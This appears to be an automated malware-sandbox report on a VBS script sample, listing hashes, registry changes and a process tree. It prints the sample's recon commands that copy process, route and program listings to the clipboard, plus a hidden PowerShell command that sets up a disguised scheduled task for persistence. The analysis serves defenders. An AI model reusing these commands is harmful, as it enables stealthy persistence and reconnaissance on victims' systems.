Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10/04/2024, 13:22
Static task
static1
Behavioral task
behavioral1
Sample
acc72156d3ad82ec5a2da1bdf9572e4b4f4d49fb31cc62e00586c0e70ae9c6ff.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
acc72156d3ad82ec5a2da1bdf9572e4b4f4d49fb31cc62e00586c0e70ae9c6ff.vbs
Resource
win10v2004-20240226-en
General
-
Target
acc72156d3ad82ec5a2da1bdf9572e4b4f4d49fb31cc62e00586c0e70ae9c6ff.vbs
-
Size
64KB
-
MD5
ab97956fec732676ecfcedf55efadcbc
-
SHA1
d17cb1fa3eaaf4de326575f769a186abee09715a
-
SHA256
acc72156d3ad82ec5a2da1bdf9572e4b4f4d49fb31cc62e00586c0e70ae9c6ff
-
SHA512
997078883598a1d9d6f9ef139085b2f157ede45b72bfb9ca4b2ebbaced7fc4e349330be702832e309fdd9c09bb8b0c00d8dc7dacb7e0486276b0d48767774e74
-
SSDEEP
768:Ekxs2aBaWJdSrorxX17vKzs8FuB8LgL0px+DE54UqO6zKSxgqDl:EkxRaQWJgEX17vKzs8oeLgLUUVbO6zKi
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation WScript.exe -
Deletes itself 1 IoCs
pid Process 4412 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2732 tasklist.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{706AAA0D-F73D-11EE-B3C6-5E2396FD2BC6} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings OpenWith.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2732 tasklist.exe 2732 tasklist.exe 3328 powershell.exe 3328 powershell.exe 2160 powershell.exe 2160 powershell.exe 2160 powershell.exe 4368 powershell.exe 4368 powershell.exe 4368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2732 tasklist.exe Token: SeDebugPrivilege 3328 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeIncreaseQuotaPrivilege 4368 powershell.exe Token: SeSecurityPrivilege 4368 powershell.exe Token: SeTakeOwnershipPrivilege 4368 powershell.exe Token: SeLoadDriverPrivilege 4368 powershell.exe Token: SeSystemProfilePrivilege 4368 powershell.exe Token: SeSystemtimePrivilege 4368 powershell.exe Token: SeProfSingleProcessPrivilege 4368 powershell.exe Token: SeIncBasePriorityPrivilege 4368 powershell.exe Token: SeCreatePagefilePrivilege 4368 powershell.exe Token: SeBackupPrivilege 4368 powershell.exe Token: SeRestorePrivilege 4368 powershell.exe Token: SeShutdownPrivilege 4368 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeSystemEnvironmentPrivilege 4368 powershell.exe Token: SeRemoteShutdownPrivilege 4368 powershell.exe Token: SeUndockPrivilege 4368 powershell.exe Token: SeManageVolumePrivilege 4368 powershell.exe Token: 33 4368 powershell.exe Token: 34 4368 powershell.exe Token: 35 4368 powershell.exe Token: 36 4368 powershell.exe Token: SeIncreaseQuotaPrivilege 4368 powershell.exe Token: SeSecurityPrivilege 4368 powershell.exe Token: SeTakeOwnershipPrivilege 4368 powershell.exe Token: SeLoadDriverPrivilege 4368 powershell.exe Token: SeSystemProfilePrivilege 4368 powershell.exe Token: SeSystemtimePrivilege 4368 powershell.exe Token: SeProfSingleProcessPrivilege 4368 powershell.exe Token: SeIncBasePriorityPrivilege 4368 powershell.exe Token: SeCreatePagefilePrivilege 4368 powershell.exe Token: SeBackupPrivilege 4368 powershell.exe Token: SeRestorePrivilege 4368 powershell.exe Token: SeShutdownPrivilege 4368 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeSystemEnvironmentPrivilege 4368 powershell.exe Token: SeRemoteShutdownPrivilege 4368 powershell.exe Token: SeUndockPrivilege 4368 powershell.exe Token: SeManageVolumePrivilege 4368 powershell.exe Token: 33 4368 powershell.exe Token: 34 4368 powershell.exe Token: 35 4368 powershell.exe Token: 36 4368 powershell.exe Token: SeIncreaseQuotaPrivilege 4368 powershell.exe Token: SeSecurityPrivilege 4368 powershell.exe Token: SeTakeOwnershipPrivilege 4368 powershell.exe Token: SeLoadDriverPrivilege 4368 powershell.exe Token: SeSystemProfilePrivilege 4368 powershell.exe Token: SeSystemtimePrivilege 4368 powershell.exe Token: SeProfSingleProcessPrivilege 4368 powershell.exe Token: SeIncBasePriorityPrivilege 4368 powershell.exe Token: SeCreatePagefilePrivilege 4368 powershell.exe Token: SeBackupPrivilege 4368 powershell.exe Token: SeRestorePrivilege 4368 powershell.exe Token: SeShutdownPrivilege 4368 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeSystemEnvironmentPrivilege 4368 powershell.exe Token: SeRemoteShutdownPrivilege 4368 powershell.exe Token: SeUndockPrivilege 4368 powershell.exe Token: SeManageVolumePrivilege 4368 powershell.exe Token: 33 4368 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4756 iexplore.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4756 iexplore.exe 4756 iexplore.exe 4892 IEXPLORE.EXE 4892 IEXPLORE.EXE 5068 OpenWith.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4756 wrote to memory of 4892 4756 iexplore.exe 88 PID 4756 wrote to memory of 4892 4756 iexplore.exe 88 PID 4756 wrote to memory of 4892 4756 iexplore.exe 88 PID 4412 wrote to memory of 2908 4412 WScript.exe 91 PID 4412 wrote to memory of 2908 4412 WScript.exe 91 PID 2908 wrote to memory of 2732 2908 cmd.exe 93 PID 2908 wrote to memory of 2732 2908 cmd.exe 93 PID 2908 wrote to memory of 3664 2908 cmd.exe 94 PID 2908 wrote to memory of 3664 2908 cmd.exe 94 PID 4412 wrote to memory of 3020 4412 WScript.exe 97 PID 4412 wrote to memory of 3020 4412 WScript.exe 97 PID 3020 wrote to memory of 4568 3020 cmd.exe 101 PID 3020 wrote to memory of 4568 3020 cmd.exe 101 PID 3020 wrote to memory of 464 3020 cmd.exe 102 PID 3020 wrote to memory of 464 3020 cmd.exe 102 PID 4412 wrote to memory of 4016 4412 WScript.exe 103 PID 4412 wrote to memory of 4016 4412 WScript.exe 103 PID 4016 wrote to memory of 1316 4016 cmd.exe 105 PID 4016 wrote to memory of 1316 4016 cmd.exe 105 PID 4016 wrote to memory of 4768 4016 cmd.exe 106 PID 4016 wrote to memory of 4768 4016 cmd.exe 106 PID 4412 wrote to memory of 4320 4412 WScript.exe 107 PID 4412 wrote to memory of 4320 4412 WScript.exe 107 PID 4320 wrote to memory of 3416 4320 cmd.exe 109 PID 4320 wrote to memory of 3416 4320 cmd.exe 109 PID 4320 wrote to memory of 4148 4320 cmd.exe 110 PID 4320 wrote to memory of 4148 4320 cmd.exe 110 PID 4412 wrote to memory of 3328 4412 WScript.exe 111 PID 4412 wrote to memory of 3328 4412 WScript.exe 111 PID 4412 wrote to memory of 2160 4412 WScript.exe 115 PID 4412 wrote to memory of 2160 4412 WScript.exe 115 PID 4412 wrote to memory of 4368 4412 WScript.exe 117 PID 4412 wrote to memory of 4368 4412 WScript.exe 117
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\acc72156d3ad82ec5a2da1bdf9572e4b4f4d49fb31cc62e00586c0e70ae9c6ff.vbs"1⤵
- Checks computer location settings
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c tasklist /v | clip2⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\tasklist.exetasklist /v3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\system32\clip.execlip3⤵PID:3664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Route print | clip2⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\ROUTE.EXERoute print3⤵PID:4568
-
-
C:\Windows\system32\clip.execlip3⤵PID:464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c dir /w "C:\Windows/../Program Files" | clip2⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" dir /w "C:\Windows/../Program Files" "3⤵PID:1316
-
-
C:\Windows\system32\clip.execlip3⤵PID:4768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c dir /w "C:\Windows/../Program Files (x86)" | clip2⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" dir /w "C:\Windows/../Program Files (x86)" "3⤵PID:3416
-
-
C:\Windows\system32\clip.execlip3⤵PID:4148
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden C:\Users\Admin\AppData\Local\Temp\2022.hwp2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden <table width="730" border="0" cellspacing="0" cellpadding="0"> <!-- Error title --> <tbody><tr> <td width="60" align="left" id="infoIconAlign" valign="top" rowspan="2"> <img id="infoIcon" alt="Info icon" src="info_48.png"> </td> <td width="*" align="left" id="mainTitleAlign" valign="middle"> <h1 id="mainTitle">The website cannot display the page</h1> </td> </tr> <tr> <!-- This row is for HTTP status code, as well as the divider--> <td align="right" class="errorCodeAndDivider" id="http405Align"><id id="http405"> HTTP 405</id> <div class="divider"></div> </td> </tr> <!-- Error Body --> <tr> <td> </td> <td align="left" id="mostlikelyAlign" valign="top"> <h3><id id="mostlikely">Most likely cause:</id></h3> <ul> <li><id id="programerror">The website has a programming error.</id></li> </ul> </td> </tr> <!-- What you can do --> <tr> <td> </td> <td align="left" id="whatToTryAlign" valign="top"> <h2 id="whatToTry">What you can try:</h2> </td> </tr> <!-- back to previous page --> <tr> <td> </td> <td align="left" id="goBackAlign" valign="middle"> <h4> <table> <tbody><tr> <td valign="top"> <img class="actionIcon" alt="" src="bullet.png" border="0"> </td> <td valign="top"> <span id="goBackContainer"><a href="javascript:history.back();">Go back to the previous page.</a></span><noscript id="goBack">Go back to the previous page.</noscript> </td> </tr> </tbody></table> </h4> </td> </tr> <!-- InfoBlock --> <tr> <td align="right" id="infoBlockAlign" valign="top"> </td> <td align="left" id="moreInfoAlign" valign="middle"> <h4> <table> <tbody><tr> <td valign="top"> <a onclick="javascript:expandCollapse('infoBlockID', true); return false;" href="#"><img class="actionIcon" id="infoBlockIDImage" alt="More information" src="down.png" border="0"></a> </td> <td valign="top"> <span id="moreInfoContainer"><a href="javascript:expandCollapse('infoBlockID', true);">More information</a></span> <noscript><ID id="moreInformation">More information</ID></noscript> </td> </tr> </tbody></table> </h4> <div class="infoBlock" id="infoBlockID" style="display: none;"> <p id="errorExplanation">This error (HTTP 405 Method Not Allowed) means that Internet Explorer was able to connect to the website, but the site has a programming error.</p> <p id="moreInfoSeeHelp">For more information about HTTP errors, see Help.</p> </div> </td> </tr> </tbody></table>2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden $a = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\mscornet.vbs';$t1 = New-ScheduledTaskTrigger -Daily -At 10AM;$t2 = New-ScheduledTaskTrigger -Daily -At 11AM;$t3 = New-ScheduledTaskTrigger -Daily -At 3PM;$t4 = New-ScheduledTaskTrigger -Daily -At 4PM;$t5 = New-ScheduledTaskTrigger -Daily -At 5PM;$t6 = New-ScheduledTaskTrigger -AtLogOn;$d = 'Export the 10 newest events in the application logs';Register-ScheduledTask -Action $a -TaskName 'Google Update Source Link' -Trigger $t1,$t2,$t3,$t4,$t5,$t6 -Description $d;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵PID:1268
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4756 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4892
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5068
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
948B
MD544cd935b8b295e024c793a8038cbeed8
SHA1dd4dfeb934e2e5fc83cb7d3e7c4a10dd5db6a5d3
SHA256f8f56bbc223c56d860b9f71fb4c5f1809c0be7aae71f6bc0ec2e3b163aa9b3dd
SHA5129285020e7455e6fc2c235256dcca37a8cf2f341cb09345b1182ca8b43f260dcbb5aca2dfe508d616d9df868daad7e5b7b6b6e1518e4ccca98aed3854eed323d0
-
Filesize
45KB
MD55097e5a2eb414a40db840408b29355c1
SHA1761345512219b2e4616707dbb3f9fb87b807404c
SHA25612c54133a7ca59edbc7bd28a6901ecfc883ca4e4f742b2bc2a7acd95acc75417
SHA512cf68b2aaed094e86833a89e0804319dd93a9412f297774661968575a66659b07a5038f44ff70de6f2a4653353ceecdaedeb23dfc342e13d4bb0a965f676cbda3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82